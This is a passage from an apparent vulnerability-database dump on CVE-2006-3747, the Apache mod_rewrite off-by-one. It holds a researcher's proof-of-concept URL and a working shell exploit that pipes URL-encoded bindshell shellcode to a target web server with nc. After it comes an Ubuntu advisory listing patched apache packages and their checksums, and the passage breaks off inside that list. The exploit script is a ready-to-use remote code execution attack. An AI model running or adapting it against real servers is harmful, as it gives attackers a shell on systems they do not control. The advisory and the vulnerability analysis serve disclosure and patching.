the line 2740 causes\r\nan off-by-one overflow, it's writing in token[5].\r\nTo exploit this problem is necessary a vulnerable apache version and a\r\nspecific stack frame layout.\r\n\r\nProof of concept\r\n----\r\n\r\nTo know if your apache vulnerable version could be successful\r\nexploited, write this rule in your httpd.conf or .htaccess file:\r\n\r\nRewriteRule kung/(.*) $1\r\n\r\nAnd try to access to the following URL:\r\n/kung/ldap://localhost/AAAAAAAAAAAAAAAAAAAAA%3FAAAAAAAAAAAAA%\r\n3FAAAAAAAAAAAAAAA%3FAAAAAAAAAA%3FAAAAAAAAAA%3FBBBBBBBBBBBBBB\r\n\r\nIf your web server doesn't reply you with a '302 Found' page or a\r\nSegmentation Fault appears in your error_log, an apache child has\r\ncrashed and your web server is vulnerable and exploitable.\r\n\r\nExploit\r\n----\r\n\r\nThis exploit was successful executed on Apache 1.3.34, debian\r\nsarge package:\r\n\r\n#!/bin/sh\r\n# Exploit for Apache mod_rewrite off-by-one.\r\n# Vulnerability discovered by Mark Dowd.\r\n# CVE-2006-3747\r\n# \r\n# by jack <jack\x40gulcas\x2Eorg>\r\n# 2006-08-20\r\n#\r\n# Thx to xuso for help me with the shellcode.\r\n#\r\n# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not\r\n# you must recalculate adressess.\r\n#\r\n# Shellcode is based on Taeho Oh bindshell on port 30464 and modified\r\n# for avoiding apache url-escape.. 
Take a look is quite nice ;)\r\n#\r\n# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at\r\n# 0x0834ae77 for any other version/system find it.\r\n#\r\n# Gulcas rulez :P\r\n\r\necho -e "mod_rewrite apache off-by-one overflow\nby jack <jack\x40gulcas\r\n\x2eorg>\n\n"\r\n\r\nif [ $# -ne 1 ] ; then\r\n echo "Usage: $0 webserver"\r\n exit\r\nfi\r\n\r\nhost=$1\r\n\r\necho -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6%\r\n31%c0%31 %db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3%\r\n01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04%\r\n31%c0%89%46%10%b0%10%89%46%08% b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66%\r\nb3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31%\r\nc9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8%\r\n23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76%\r\n08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db%\r\ncd %80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%\r\n77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\nHost:\r\n$host\r\n\r\n" | nc $host 80\r\n\r\n\r\nMore info is coming at http://ciberjacobo.com/sec/mod_rewrite.html\r\n\r\n\r\n-- \r\nJacobo Avariento Gimeno\r\nhttp://ciberjacobo.com\r\nOpenPGP key: http://ciberjacobo.com/key.pem", "edition": 1, "modified": "2006-08-21T00:00:00", "published": "2006-08-21T00:00:00", "id": "SECURITYVULNS:DOC:13975", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13975", "title": "POC & exploit for Apache mod_rewrite off-by-one", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "=========================================================== \r\nUbuntu Security Notice USN-328-1 July 27, 2006\r\napache2 
vulnerability\r\nCVE-2006-3747\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 5.04\r\nUbuntu 5.10\r\nUbuntu 6.06 LTS\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 5.04:\r\n apache2-mpm-perchild 2.0.53-5ubuntu5.6\r\n apache2-mpm-prefork 2.0.53-5ubuntu5.6\r\n apache2-mpm-threadpool 2.0.53-5ubuntu5.6\r\n apache2-mpm-worker 2.0.53-5ubuntu5.6\r\n\r\nUbuntu 5.10:\r\n apache2-mpm-perchild 2.0.54-5ubuntu4.1\r\n apache2-mpm-prefork 2.0.54-5ubuntu4.1\r\n apache2-mpm-threadpool 2.0.54-5ubuntu4.1\r\n apache2-mpm-worker 2.0.54-5ubuntu4.1\r\n\r\nUbuntu 6.06 LTS:\r\n apache2-mpm-perchild 2.0.55-4ubuntu2.1\r\n apache2-mpm-prefork 2.0.55-4ubuntu2.1\r\n apache2-mpm-worker 2.0.55-4ubuntu2.1\r\n\r\nIn general, a standard system upgrade is sufficient to effect the\r\nnecessary changes.\r\n\r\nDetails follow:\r\n\r\nMark Dowd discovered an off-by-one buffer overflow in the mod_rewrite\r\nmodule's ldap scheme handling. On systems which activate\r\n"RewriteEngine on", a remote attacker could exploit certain rewrite\r\nrules to crash Apache, or potentially even execute arbitrary code\r\n(this has not been verified).\r\n\r\n"RewriteEngine on" is disabled by default. 
Systems which have this\r\ndirective disabled are not affected at all.\r\n\r\n\r\nUpdated packages for Ubuntu 5.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6.diff.gz\r\n Size/MD5: 109849 b9346454def0a9b0ed83e5c31e5715d1\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6.dsc\r\n Size/MD5: 1159 a4def08b6aff949a8503606f49614bfd\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53.orig.tar.gz\r\n Size/MD5: 6925351 40507bf19919334f07355eda2df017e5\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.53-5ubuntu5.6_all.deb\r\n Size/MD5: 3578948 9c1bfb6108268f5438673aa522459e9e\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-threadpool_2.0.53-5ubuntu5.6_all.deb\r\n Size/MD5: 34364 8a61625863e9135f4ad5bcf4d6b5cb7b\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 826722 d3cbadc06958f8247345bcf851047f06\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 221644 5759cbbf3cbeffcf796967de7ed1edf6\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 217284 a65b171976c4575530fc6e8f06f48822\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 220692 f39e9387d0fde69d26530f1340ebd2b4\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 168046 692d290a85d73e77b8ca6657fc71cc09\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 168822 f2677841cd39b26c9262b18752cc4f68\r\n 
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 93502 1cd458dd0ad1c5e6190eef8115066061\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 34294 4405aaf5e8d6d5ba6ae43cefba440323\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 279670 bee6e2360d03837a9f474f4519a2b449\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 138178 2f74d6f152fc98202903688b30185c77\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 789726 fd570ca5737770335853e2f4e5f260b5\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 201924 1a4dae1a8a9c6ef8ce9732d06e4fddf6\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 197692 e8c111bd39f8911463aabda812946282\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 201118 ac29377492d905679525927368fc9735\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 168050 adeb116ef7c6526cdaf7a1c8ac106239\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 168828 c4402140647838846c51fdce9ee879d8\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 91230 a02d0b374da62558f4f81c2ac0214791\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 34290 3a732750f6f27607b5c57f8d28848bf9\r\n 
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 257604 dd755d2b6660a4539a0d0ef12d9ee1a4\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 128830 bb403a8fad936a0d984dc9e9e9960410\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 856012 d5398302b1a8ee33e6aa2b072a49f00c\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 214930 1344c775b350d76cebd600c44ab746e5\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 210038 98c1f7c0344f802451adaed9ec136057\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 213964 2c1a05518f573f59c22a24aab31fa96d\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 168032 4ec1359d21c77c3e404b29906686aada\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 168830 b659aae402e4288ed796b58cc6e72272\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 102882 03b81e86cfd0fbab9c23d33fc65685bb\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 34290 5f92cd47424b1e9783663a2840afa9f5\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 272938 54bcdfc67e28267ae1ec35797f0e5af2\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 135176 807eb136292652bf363431d3ae1ef1ad\r\n\r\nUpdated packages for Ubuntu 5.10:\r\n\r\n Source 
archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1.diff.gz\r\n Size/MD5: 116024 b53c0d8c432054825e233e90d6f79185\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1.dsc\r\n Size/MD5: 1159 90ede3b8d1ee455fa6a77e6f9ecf3c25\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54.orig.tar.gz\r\n Size/MD5: 7493636 37d0d0a3e25ad93d37f0483021e70409\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.54-5ubuntu4.1_all.deb\r\n Size/MD5: 3862918 e67e0de3ac73965b6f67fceeecabdd4f\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-threadpool_2.0.54-5ubuntu4.1_all.deb\r\n Size/MD5: 35212 d4dc3c2515f09ec7f37efcfd5436779b\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 826232 57008eb5cc674891d4707b8b33f5af8d\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 226166 a9efe63e80286d4ced4877ae4bcf1dbe\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 220784 2bbd3faed82d0d8656e311346c134d84\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 225376 599a089934ad760656287d0e680b9de2\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 169428 f69d3ce076ecd8e7d9dc37cb8e543b40\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 170172 6fead4ff8126ded741f4ac5e424b4bad\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 93152 3fb415d787aad22345e513206e8e8479\r\n 
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 35140 62450c6ab735e10b67ad457219b0944c\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 283424 4fce24ccdbdb1e27a5be16ba0de4d8b8\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 142830 e4ca649a33bc48b547d134e0587432d7\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 780832 2f02a9060e304224ed9e7c3039adf90c\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 201392 c1f7f10d3c4d570e002f625064bbbcb3\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 197288 378ab4f09803643496075717a8e6c533\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 200848 cceb75fd6bb828376e9dd558bc41a833\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 169428 5d396b14e48c745d411aa0607e88b8b0\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 170158 cc17f207e6cbd662b9127f6068be5596\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 91434 da701963eefb26198585efa199320c39\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 35146 e4cf87606456c5a7df12705882883f93\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 259762 aefba46cb0453d69b9cd46c315b33fa8\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4.1_i386.deb\r\n 
Size/MD5: 131222 65c39f9c635463ef6bbb19400c1577c0\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 854152 0a4ad05f422b52a20db9f9f835e743bd\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 218344 ad6af747493a5f88dc59d74130a81972\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 213996 4dee81cbe8f41267e3724cdc02997e48\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 217488 a80c6725824125f83a5e5c6ba9721e8a\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 169426 fe5d1b5946e456811c993f3852d2a42a\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 170160 8fe022611640222f696e71c0c98e6825\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 103446 0464063bde5b27a75cbb3786e1b03dbd\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 35146 270f6fdf49eba45102c8f803ad453fc7\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 279034 db649e0c8ab3e27f7aa0de522423b66d\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 140286 dc00d0716d93f668d85e88489ea40500\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 799390 d08a9ae0da77a651c03a34dbfc60cb49\r\n 
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 209402 fd1537a75780215c521eaa1d86f6dac0\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 205052 c671dc14f003efd78724b590bd47c17a\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 208612 9a3bd42326cf873f0d75edad80400a1f\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 169440 e57d15a89648fc725f8c2e57517ce839\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 170182 97633fec703ccf87290d8cd258098ccc\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 93092 5dd42a24b752012bd4f10676f91bb7d3\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 35146 c72067dac60dcaf6995186411ce8a714\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 264966 19a4f77fea0a28b9097bda0f77b533a8\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 128274 86c0e3518fc19e1371ad928e09ead70b\r\n\r\nUpdated packages for Ubuntu 6.06 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1.diff.gz\r\n Size/MD5: 115088 d045e2652698d0cfaa11b9e65252bb67\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1.dsc\r\n Size/MD5: 1148 cda4a30a1e278c238b1dc2e9c8098655\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz\r\n Size/MD5: 6092031 45e32c9432a8e3cf4227f5af91b03622\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1.diff.gz\r\n 
Size/MD5: 352050 67258b257c6267ff4f822a67098ca9ad\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1.dsc\r\n Size/MD5: 1102 1bd4dbdc8388cc6e4c79322f31cb8151\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34.orig.tar.gz\r\n Size/MD5: 3105068 9d289f80ddca7389ab9bc6970636d6ad\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dev_1.3.34-2ubuntu0.1_all.deb\r\n Size/MD5: 332876 a5a005bf56c8c1dfa4e3128a1cf78f67\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-doc_1.3.34-2ubuntu0.1_all.deb\r\n Size/MD5: 1195566 4d3cbdac9a6fdb435d590dbe90ca4a86\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu2.1_all.deb\r\n Size/MD5: 2124178 dffcfe4126e3b53e32d19166bf3f853f\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.34-2ubuntu0.1_amd64.deb\r\n Size/MD5: 875232 49196a7f16300f0968d03e26b87f4112\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.34-2ubuntu0.1_amd64.deb\r\n Size/MD5: 8868800 609262555eed5f16f37a05937557ac71\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.34-2ubuntu0.1_amd64.deb\r\n Size/MD5: 533004 01819af5f2f36a4a109575b0340e3a01\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.34-2ubuntu0.1_amd64.deb\r\n Size/MD5: 517002 962478c0d73709e5ebadb6698a5b35bb\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 832826 46d8ac4963392385b154ee311717b125\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 227652 e57d6f19beb0cc3c731a22396037f853\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 222770 
36d29beb67174e796f22770f812e521e\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 227350 1dd4f42480f3801041a40f338c77be79\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 170918 7e0203cdf1f52291bd37207736a8bab8\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 171690 4f9fd4647a2df63abd84ae7c6f296efa\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 93770 7a4a247b34afd27c9e81f222e7b26a9e\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 35748 807f1c5a0f5d94370e5f7c712517d77c\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1_amd64.deb\r\n Size/MD5: 408106 3b8da12e0330f042fbb082e61014097d\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.4-2ubuntu0.1_amd64.deb\r\n Size/MD5: 495138 2eee03a0677d1b236f4798257fa671a3\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 285168 7c95e82707461eb6fe6139af048e5386\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 143804 df89f11a7f4fd5010c827ec9e8897af5\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.34-2ubuntu0.1_i386.deb\r\n Size/MD5: 836848 d4e547eca9e76aa5e2e0e4344fe68595\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.34-2ubuntu0.1_i386.deb\r\n Size/MD5: 8630002 9a8de2e1f34e3401f6bc4c85faf79643\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.34-2ubuntu0.1_i386.deb\r\n Size/MD5: 499622 c7a9b16e4a979eafe4955368a70f76cc\r\n 
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.34-2ubuntu0.1_i386.deb\r\n Size/MD5: 487480 010350ad0468be173b27cd687fa7bfb0\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 785996 1e7eba9a96e1c96b24c425fc1d1b0c8e\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 202290 dbb1357c99b8a574b6436e858db28767\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 198272 a6009454cdd2743972c5f4c821dd5dea\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 201822 c482c5e814f1bb93fc5be21349f21a08\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 170934 df6d16ffdeac51db8b96afd789bbb72c\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 171698 2ca5dee34aebf25d7d0d4036babddab0\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 91722 c8921ae03c537badefaf5254f491b0e5\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 35754 e0c31ed00cec17eb1ee96b06091f4101\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1_i386.deb\r\n Size/MD5: 384724 ba1902bbd2db824e53ff1793252e5260\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.4-2ubuntu0.1_i386.deb\r\n 